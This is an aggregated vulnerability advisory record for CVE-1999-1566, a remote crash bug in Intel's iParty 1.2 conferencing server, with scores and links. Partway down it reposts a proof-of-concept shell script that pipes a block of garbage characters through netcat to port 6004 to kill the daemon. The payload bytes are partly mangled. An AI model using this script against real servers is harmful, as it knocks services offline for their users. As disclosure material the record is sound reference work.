CVE-1999-1566
CVSS 5.0
Published: 1999-05-08 00:00:00
Last revised: 2008-09-05 16:19:49

[Original] Buffer overflow in iParty server 1.2 and earlier allows remote attackers to cause a denial of service (crash) by connecting to default port 6004 and sending repeated extended characters.


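[CNNVD] iParty Conferencing Server remote denial-of-service vulnerability (CNNVD-199905-021)

iParty is a small voice conferencing chat program developed by the Intel Experimental Technologies Department.
The iParty conferencing daemon does not correctly handle malformed requests submitted by users; a remote attacker can exploit this vulnerability to carry out a denial-of-service attack against the conferencing system.
An attacker can send a large number of characters to port 6004, where the conferencing daemon listens, causing the service to crash and stop responding to legitimate requests.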
        

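- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may cause reduced performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]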

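- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links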

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1566
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1566
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-021
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/archive/1/13600
(VENDOR_ADVISORY)  BUGTRAQ  19990508 iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)

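- Vulnerability information

iParty Conferencing Server remote denial-of-service vulnerability
Medium severity, boundary condition error
1999-05-08 00:00:00 2005-10-20 00:00:00
Remote

iParty is a small voice conferencing chat program developed by the Intel Experimental Technologies Department.
The iParty conferencing daemon does not correctly handle malformed requests submitted by users; a remote attacker can exploit this vulnerability to carry out a denial-of-service attack against the conferencing system.
An attacker can send a large number of characters to port 6004, where the conferencing daemon listens, causing the service to crash and stop responding to legitimate requests.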
        

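- Advisories and patches

Vendor patch:
Intel Corporation
-----------------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: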
        
        http://www.intel.com

- Vulnerability information (22250)

iParty Conferencing Server Denial Of Service Vulnerability (EDBID:22250)
multiple dos
1999-05-08 Verified
0 wh00t
N/A
source: http://www.securityfocus.com/bid/6844/info

A buffer overflow condition has been discovered in the Intel iParty server.

It is possible to trigger a denial of service by submitting an excessive number of characters to the network port used by the iParty server. The server will need to be restarted to regain normal functionality.

This issue may be due to a buffer overrun, potentially resulting in arbitrary code execution. This possibility has not been confirmed. 

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.


if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"̐a?p/?HÔD?0iAáœL%ÏÌ?EBEԁð'*}ÒyÓÔ¥(3êz?nÃuèԏj+š°(Ö?Ö?d'??øZiXåËy7¡'``àŸœÏ	Cµ¶ïüÖʹçî³ÏÞçìœÏ>çܐE¢6?â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=oš§?8ÂӁ'L5"ïé²±?á€žDRGÒIôlq?Y­g?»Òi?ÆiÕŸëH¹H?w?òᜲ»Ô3ðl??*oÎ#ésC9m,

_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi		

- Vulnerability information

12653
iParty Client Extended Character Handling Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- Vulnerability description

- Timeline

1998-11-30 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

iParty Conferencing Server Denial Of Service Vulnerability
Boundary Condition Error 6844
Yes No
1999-05-08 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability has been credited to: wh00t X <bugtraq2@hotmail.com>

- Affected software versions

Intel Corporation iParty Conferencing server 1.2

- Discussion

A buffer overflow condition has been discovered in the Intel iParty server.

It is possible to trigger a denial of service by submitting an excessive number of characters to the network port used by the iParty server. The server will need to be restarted to regain normal functionality.

This issue may be due to a buffer overrun, potentially resulting in arbitrary code execution. This possibility has not been confirmed.

- Exploit

The following proof of concept code was supplied by wh00t X <bugtraq2@hotmail.com>:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
